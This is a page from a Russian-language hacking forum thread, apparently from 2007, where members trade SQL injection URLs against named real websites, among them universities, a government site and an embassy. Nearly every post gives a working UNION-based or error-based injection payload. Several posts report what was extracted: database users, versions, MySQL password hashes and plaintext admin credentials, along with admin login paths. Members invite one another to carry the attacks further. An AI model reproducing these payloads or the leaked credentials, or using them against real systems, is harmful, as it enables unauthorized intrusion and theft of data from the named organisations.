HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 234 из 1602 « Первая < 134184224 230 231 232 233 234 235 236 237 238 2442843347341234 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.06.2007, 12:12
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию
Нужно перейти к несуществующим значениям ID, т.е -2435
и подобрать имя таблицы
Код:
http://prospectus.ulster.ac.uk/course/?id=-2435+UNION+select+1,2,3+from+user/*
𝕏 Twitter Reddit Telegram Копировать ссылку
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #2  
Старый 01.06.2007, 12:15
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию
forum.sunrise.ru
Код:
http://forum.sunrise.ru/forum.asp?FORUM_ID=36+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('jiaozhu','FORUM_REPLY','FORUM_TOPICS','t_jiaozhu','FORUM_MODERATOR','FORUM_ALLOWED_MEMBERS','dtproperties','FORUM_TOTALS','FORUM_CATEGORY','FORUM_MEMBERS','FORUM_FORUM','FORUM_CONFIG'))--
Yfi4hevSMS:Admin
админка:
Код:
http://forum.sunrise.ru/admin_login.asp
mmis.umt.edu
Код:
http://mmis.umt.edu/CCFacil.asp?cName=Missoula&Type=County&Number=4'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('m_LogBuySpecies','syssegments','sysconstraints','m_LogBuy','ca_history','ca_holding','ca_lendar','ca_eventtype','dtproperties','ca_topictype','m_Activities','cm_city','m_BBER','m_changeLog','m_contacts','m_contacttype','m_EvalSurvey','m_CURFORMailList','m_equipprocess','m_facil_hold','m_contacts_hold','m_facilprod','m_inputdist','m_groups','m_LogPriceMailList','m_NAICS','m_Outlook03','m_outputdist','m_PrimBus','m_inputs','m_prod_hold','m_products','m_productstatus','m_SecondaryWoodSurvey2005','m_facility','m_SpecialtyLogMailList','m_vwcertNameAbbrev','m_TechList','m_vwcerts','m_VWCONTACTS','m_vwequipprocess','m_vwfacility','m_vwfacilprod','m_VWForAccess','m_vwinputs','m_SIC','m_vwLogBuySpecies','m_vwlogbuy','m_vwTechList','mf_globals','mID_vwContacts','mID_vwfacilprod','r_db','mID_vwfacility','r_orgtype','r_keywords','r_vwdb','m_SenateFinance1','r_services','m_certs','cm_county'))--
chslovo.com
Код:
http://www.chslovo.com/include/output_articles.asp?Id=1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('articles','Ans','Que','Site_Articles','Site_Articles1','Site_Forum_A_TOPICS','Site_Forum_ALLOWED_MEMBERS','Site_Forum_CATEGORY','Site_Forum_CONFIG_NEW','Site_Forum_FORUM','Site_Forum_A_REPLY','Site_Forum_GROUPS','Site_Forum_GROUP_NAMES','Site_Forum_MEMBERS','Site_Forum_MEMBERS_PENDING','Site_Forum_MODERATOR','Site_Forum_REPLY','Quiz','Site_Forum_SUBSCRIPTIONS','Site_Forum_TOPICS','Site_Forum_TOTALS','Site_Numbers','Site_numbers1','Site_Rubrics','Site_Pictures','Site_Users','Site_Users_Conf','Site_Texts','Site_Users_Privs','Site_Users_Emails','View_Adv_Search','sysconstraints','syssegments','t_jiaozhu','D99_Tmp','dtproperties'))--
admin:ghjcnjnfr

Цитата:
Цитата:
http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать


тут нету иньекции... вывод ошибки не sql.
посл. вывод вывод в ссылке:
Код:
http://webmascon.com/archive/topic.asp?id=-1+union+select+1,2,3,version(),database(),6,user()/*
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #3  
Старый 01.06.2007, 13:39
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
С нами: 10140806

Репутация: 932


По умолчанию
http://www.tehorng.com/
Код:
http://www.tehorng.com/release.php?release=-11959+union+select+1,2,3,4,user(),password,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26+from+mysql.user/*
User:tehorng
Password(хеш): *5837662AE1DB0E6C8864BF4F5F3600EA202395E1

http://www.gamerevolution.com
Код:
http://www.gamerevolution.com/manifesto/view.php?id=-264+union+select+1,2,user(),version(),5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #4  
Старый 01.06.2007, 14:47
CRL
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
С нами: 10291924

Репутация: 413
По умолчанию
Вот здесь даже подобрал и даже версию и имя админа узнал а дальше(((
matrix_user@localhost
4.1.21-standard-log
Код:
http://www.matrixpack.ee/?go=gallery&g=21+union+select+1/*
А вот еще
Код:
http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,7,8,9,10/*
Только не уверен что подобрал правильное количество - но это единственное что вызывало хоть что-нибудь кроме ошибки.
Последний раз редактировалось CRL; 01.06.2007 в 15:09..
 
Ответить с цитированием

  #5  
Старый 01.06.2007, 16:56
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
С нами: 10315029

Репутация: 165
По умолчанию
Цитата:
Сообщение от CRL  
Вот здесь даже подобрал и даже версию и имя админа узнал а дальше(((
matrix_user@localhost
4.1.21-standard-log
Код:
http://www.matrixpack.ee/?go=gallery&g=21+union+select+1/*
А вот еще
Код:
http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,7,8,9,10/*
Только не уверен что подобрал правильное количество - но это единственное что вызывало хоть что-нибудь кроме ошибки.
databse: nuke
version: 4.1.20-log
user: root
pass: *D4BBC2141A32BB10BC1641424058A822737B0876
Код:
http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,database(),version(),user(),password+from+mysql.user
 
Ответить с цитированием

  #6  
Старый 01.06.2007, 18:40
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами: 10695206

Репутация: 245
По умолчанию
Код:
http://www.tyndall.ac.uk/generate/staffprint/staff-view.php?id=-1+UNION+SELECT+1,2,3,4/*
Код:
http://gopanthers.fit.edu/sports_info/view.php?id=-11+UNION+SELECT+1,2,3,4/*
Код:
http://www.ecodefense.ru/view.php?id=-431+ORDER+BY+11/*
Код:
http://www.tam.ca.gov/view.php?id=-14+UNION+SELECT+1,2,3,4/*
Код:
http://www.b-connect.ru/view.php?cid=111'
просто ошыбка, ищо непроверял на инж. если есть иекцыя то можно будет посидень на чужом компе=)

http://www.ccp-austria.at/view.php?id=52'
Notice: Undefined offset: 0 in D:\Inetpub\wwwroot\www.ccp-austria.at\view.php on line 213
 
Ответить с цитированием

  #7  
Старый 02.06.2007, 00:25
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами: 10495046

Репутация: 2642


По умолчанию
Цитата:
http://www.houseofbamboo.in/category.php?catid=-81+union+select+1,concat(USER(),0x3a,VERSION(),0x3 a,DATABASE()),3,4,5,6,7/*
Гы, чёто больше ничего сделать не могу =\
 
Ответить с цитированием

  #8  
Старый 02.06.2007, 00:31
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами: 10495046

Репутация: 2642


По умолчанию
Цитата:
http://www.maty.co.in/products.php?catid=-1+union+select+1,2,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),4,5,6,7/*
Не везёт мне.. Больше ничего сделать не могу.
Цитата:
http://www.bluepages.co.in/subcategory.php?catid=-63+union+select+1,2,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE())/*
Та же песня.
Цитата:
http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=-212+union+select+1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,concat(user,0x3a,password),6,7, 8,9,10,11,12+from+mysql.user/*
root:45ddce093e0d5d85
Вот терь гуд
Цитата:
http://cmcludhiana.in/news_flash.php?newsid=-16+union+select+1,2,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),4,5,6/*
Вот..
Цитата:
http://www.mannadey.in/view_news.php?newsid=-53+union+select+1,USER(),3,4,VERSION(),DATABASE(), 7,8,9/*
Вот эта скуля меня радует
Цитата:
http://www.bishopmoorecollege.in/php/newsEvents.php?NewsID=-57+union+select+concat(USER(),0x3a,VERSION(),0x3a, DATABASE())/*
Хаха ))
Цитата:
http://polandembassy.in/NewsDetail.php?news_id=-169+union+select+1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*

Цитата:
http://www.lake-house.in/news/View.php?news_id=-16+union+select+1,concat(USER(),0x3a,VERSION(),0x3 a,DATABASE()),3,4,5,6/*
Для тех кто знает китайский =\
Последний раз редактировалось NOmeR1; 02.06.2007 в 01:20..
 
Ответить с цитированием

  #9  
Старый 02.06.2007, 03:49
fjuDao
Новичок
Регистрация: 27.05.2006
Сообщений: 3
С нами: 10503369

Репутация: 15
По умолчанию
_http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*
 
Ответить с цитированием

  #10  
Старый 02.06.2007, 09:55
Neorin
Познающий
Регистрация: 30.04.2007
Сообщений: 67
С нами: 10016704

Репутация: 40
Wink
Цитата:
Сообщение от fjuDao  
_http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*

чуть не правельно постоил....попробуй так)))
http://www.koss.ru/press.php?id=666+union+select+1,concat(USER(),0x3a ,VERSION(),0x%203a,DATABASE()),3,4,5,6,7,8,9,10,11 ,12/*

вот тогда как красиво получиться))))

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/koss-www/classes/article_out.php on line 47

Edited by ice1k:
Склеил твои посты. Впредь не пиши по несколько постов подряд - редактируй пост и добавляй.
Последний раз редактировалось ice1k; 02.06.2007 в 11:35..
 
Ответить с цитированием
Ответ
Страница 234 из 1602 « Первая < 134184224 230 231 232 233 234 235 236 237 238 2442843347341234 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.